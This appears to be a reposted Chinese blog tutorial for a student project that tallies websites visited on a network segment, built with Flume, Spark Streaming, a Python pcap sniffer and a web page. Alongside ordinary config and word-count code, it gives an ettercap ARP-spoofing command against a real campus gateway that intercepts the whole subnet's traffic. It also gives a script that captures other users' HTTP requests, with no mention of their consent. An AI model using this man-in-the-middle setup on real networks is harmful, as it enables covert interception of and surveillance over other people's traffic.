您的位置:首页 > 理论基础 > 计算机网络

一个关于spark streaming+flume的小应用

2016-10-01 15:58 495 查看
这是这个学期的分布式课程是小作业,虽然期末展示的时候被老师说这个小应用与分布式没多大关系,不管怎样也是花时间做的,所以拿出来分享一下。

我这个应用是来统计一个网段某段时间内的网络访问情况,统计访问了哪些网站已经访问的频率。

1.前期准备

我是在Ubuntu上做的,安装的一些包有
apache-flume-1.5.2-bin.tar.gz   jdk-7u79-linux-x64.tar.gz  spark-1.3.1-bin-hadoop2.6.tgz

apache-maven-3.3.3-bin.tar.gz  hadoop-2.6.0.tar.gz          scala-2.11.6.tgz 

至于环境变量的配置,是参照这个来的。

2.配置flume和spark

pom.xml的文件如下:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion>

<groupId>flume</groupId>
<artifactId>Flume-SparkStreaming</artifactId>
<version>1.0</version>
<packaging>jar</packaging>
<dependencies>
<dependency>
<groupId>org.apache.spark</groupId>
<artifactId>spark-core_2.10</artifactId>
<version>1.3.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.spark</groupId>
<artifactId>spark-streaming_2.10</artifactId>
<version>1.3.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.spark</groupId>
<artifactId>spark-streaming-flume_2.10</artifactId>
<version>1.3.1</version>
</dependency>
<dependency>
<groupId>org.json</groupId>
<artifactId>json</artifactId>
<version>20141113</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<artifactId>maven-assembly-plugin</artifactId>
<configuration>
<archive>
<manifest>
<mainClass></mainClass>
</manifest>
</archive>
<descriptorRefs>
<descriptorRef>jar-with-dependencies</descriptorRef>
</descriptorRefs>
</configuration>
</plugin>
</plugins>
</build>
</project>


flume-conf.properties文件:
#netcat to avro
# Name the components on this agent
a2.sources = r2
a2.sinks = k2
a2.channels = c2

# Describe/configure the source
a2.sources.r2.type = netcat
a2.sources.r2.bind = localhost
a2.sources.r2.port = 44444

# Describe the sink
a2.sinks.k2.type = avro
a2.sinks.k2.hostname = localhost
a2.sinks.k2.port = 42424

# Use a channel which buffers events in memory
a2.channels.c2.type = memory
a2.channels.c2.capacity = 1000
a2.channels.c2.transactionCapacity = 100

# Bind the source and sink to the channel
a2.sources.r2.channels = c2
a2.sinks.k2.channel = c2


关于一些参数的解释官网上都有,我就不乱说了。

在spark的conf文件夹下,记得要让log4j.properties, slaves文件生效,就是把后面的.template去掉。
log4j.properties的内容如下:

# Set everything to be logged to the console
log4j.rootCategory=ERROR, console
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.target=System.err
log4j.appender.console.layout=org.apache.log4j.PatternLayout
log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n

# Settings to quiet third party logs that are too verbose
log4j.logger.org.eclipse.jetty=WARN
log4j.logger.org.eclipse.jetty.util.component.AbstractLifeCycle=ERROR
log4j.logger.org.apache.spark.repl.SparkIMain$exprTyper=INFO
log4j.logger.org.apache.spark.repl.SparkILoop$SparkILoopInterpreter=INFO

3.arp欺骗

使用Ettercap工具,具体参考点这里
使用的指令为:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/     

这里172.18.217.254是我这个网段的网关

4.http抓包

这个程序网上有,稍微修改了一下为了满足我这个应用的需求
#!/usr/bin/env python
import pcap
import dpkt
import re
import socket

mysock = socket.socket()
mysock.connect(('localhost',44444))

def match(pre, line):
p = re.compile(pre)
m = p.match(line)
return m

def main_pcap(p_time, p_data):
out_format = "%s\t%s\t%s\t%s\t%s\tHTTP/%s"
p = dpkt.ethernet.Ethernet(p_data)
ret = None
if p.data.__class__.__name__ == 'IP':
ip_data = p.data
src_ip = '%d.%d.%d.%d' % tuple(map(ord,list(ip_data.src)))
dst_ip = '%d.%d.%d.%d' % tuple(map(ord,list(ip_data.dst)))
if p.data.data.__class__.__name__=='TCP':
tcp_data = p.data.data
if tcp_data.dport==80:
if tcp_data.data:
try:
h = dpkt.http.Request(tcp_data.data)
except dpkt.UnpackError:
return
pre = "^/.*$"
http_headers = h.headers
host = h.headers['host']
url = host
# datetime srcip dstip GET /index.htm HTTP/1.1
ret = out_format % (p_time, src_ip, dst_ip, h.method, url, h.version)
mysock.send(url)
mysock.send("\n")
return ret

def main():
pc=pcap.pcap()
print '1111'
pc.setfilter('tcp port 80')
for p_time, p_data in pc:
ret = main_pcap(p_time, p_data)
if ret:
print ret

if __name__ == '__main__':
main()

5.spark中的程序

主要功能就是词频统计,然后将结果输出为json格式的数据
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements.  See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License.  You may obtain a copy of the License at
*
*    http://www.apache.org/licenses/LICENSE-2.0 *
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/

//package org.apache.spark.examples.streaming;

import org.apache.spark.SparkConf;
import org.apache.spark.api.java.function.Function;
import org.apache.spark.streaming.*;
import org.apache.spark.streaming.api.java.*;
import org.apache.spark.streaming.flume.FlumeUtils;
import org.apache.spark.streaming.flume.SparkFlumeEvent;
import org.apache.spark.api.java.function.*;
import org.apache.spark.api.java.JavaPairRDD;

import scala.Tuple2;

import java.util.List;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import org.json.JSONException;
import org.json.JSONStringer;
import org.json.JSONObject;

public final class JavaFlumeEventCount {
private JavaFlumeEventCount() {
}
public static void outputToJson(List<Tuple2<String, Integer>> listOfResults, String outputPath) {
JSONStringer IpJson = new JSONStringer();
IpJson.array();
for (Tuple2<String, Integer> item : listOfResults) {
IpJson.object();
IpJson.key("Domain").value(item._1);
IpJson.key("Count").value(item._2);

IpJson.endObject();
}
IpJson.endArray();
try {
File outputFile = new File(outputPath);
if (!outputFile.exists()) {
outputFile.createNewFile();
}
FileWriter fw = new FileWriter(outputFile);
BufferedWriter outBuffer = new BufferedWriter(fw);
outBuffer.write(IpJson.toString());
outBuffer.flush();
outBuffer.close();
} catch (Exception e) {
e.printStackTrace();
}
}

public static void main(String[] args) {
if (args.length != 3) {
System.err.println("Usage: JavaFlumeEventCount <host> <port> <Output Path>");
System.exit(1);
}
String host = args[0];
int port = Integer.parseInt(args[1]);
final String outputPath = args[2];
Duration batchInterval = new Duration(2000);
SparkConf sparkConf = new SparkConf().setAppName("JavaFlumeEventCount");
JavaStreamingContext ssc = new JavaStreamingContext(sparkConf, batchInterval);
JavaReceiverInputDStream<SparkFlumeEvent> flumeStream = FlumeUtils.createStream(ssc, host, port);

//use to print
flumeStream.map(
new Function<SparkFlumeEvent, String> () {
@Override
public String call(SparkFlumeEvent flumeEvent) {
return "Flume Event: " + flumeEvent.event().toString();
}
}
).print();

//map
JavaPairDStream<String, Integer> ipMap = flumeStream.mapToPair(
new PairFunction<SparkFlumeEvent, String, Integer>() {
@Override
public Tuple2<String, Integer> call(SparkFlumeEvent flumeEvent) {

JSONObject jsonobj = new JSONObject(flumeEvent.event().toString());
JSONObject jsonobj_body = new JSONObject(jsonobj.getString("body"));
String domain = jsonobj_body.getString("bytes");

Tuple2<String, Integer> result = new Tuple2<String, Integer> (domain, 1);

return result;
}
});

//reduce
JavaPairDStream<String, Integer> ipReduce = ipMap.reduceByKeyAndWindow(
new Function2<Integer, Integer, Integer> (){
@Override
public Integer call(Integer c1, Integer c2) {

return c1 + c2;
}
}, new Duration(4000), new Duration(4000));

//output
ipReduce.foreachRDD(new Function<JavaPairRDD<String, Integer>, Void>() {
@Override
public Void call(JavaPairRDD<String, Integer> rdd) {
List<Tuple2<String, Integer>> listOfResults = rdd.collect();

outputToJson(listOfResults, outputPath);

return null;
}
});
ssc.start();
}
}


因为我将
package org.apache.spark.examples.streaming;

这句注释掉了所以该程序不用放在很深的文件夹内了
/code/src/main/java/***.java

而且上面的抓包程序和pom.xml都放在code/下

6.网页展示

这段代码网上有,随便改了一下
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>getJSON获取数据</title>
<script type="text/javascript" src="js/jquery-1.8.2.min.js"></script>
<style type="text/css">
#divframe{ border:1px solid #999; width:500px; margin:0 auto;}
.loadTitle{ background:#CCC; height:30px;}
</style>
<script type="text/javascript">
$(function(){
$("#btn").click(function(){
$.getJSON("IpCount.json",function(data){
var $jsontip = $("#jsonTip");
var strHtml = "";//存储数据的变量
$jsontip.empty();//清空内容
$.each(data,function(infoIndex,info){
strHtml += "Domain:"+info["Domain"]+"<br>";
strHtml += "Count:"+info["Count"]+"<br>";
strHtml += "<hr>"
})
$jsontip.html(strHtml);//显示处理后的数据
})
})
})
</script>
</head>

<body>
<div id="divframe">
<div class="loadTitle">
<input type="button" value="获取数据" id="btn"/>
</div>
<div id="jsonTip">
</div>
</div>
</body>
</html>

7.运行

arp欺骗:
sudo ettercap -i eth0 -Tq -M arp:remote //172.18.217.254/ 

spark运行:
#!/usr/bin/env bash

spark-submit --class JavaFlumeEventCount target/Flume-SparkStreaming-1.0-jar-with-dependencies.jar localhost 42424 ../package/tomcat7/webapps/examples/IpCount.json

flume运行:
#!/usr/bin/env bash

flume-ng agent --conf /usr/local/flume/conf/ --conf-file /usr/local/flume/conf/flume-conf.properties --name a2 -Dflume.root.logger=INFO,console

http抓包:
sudo python http.py

最后访问那个网页就能看到结果了

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息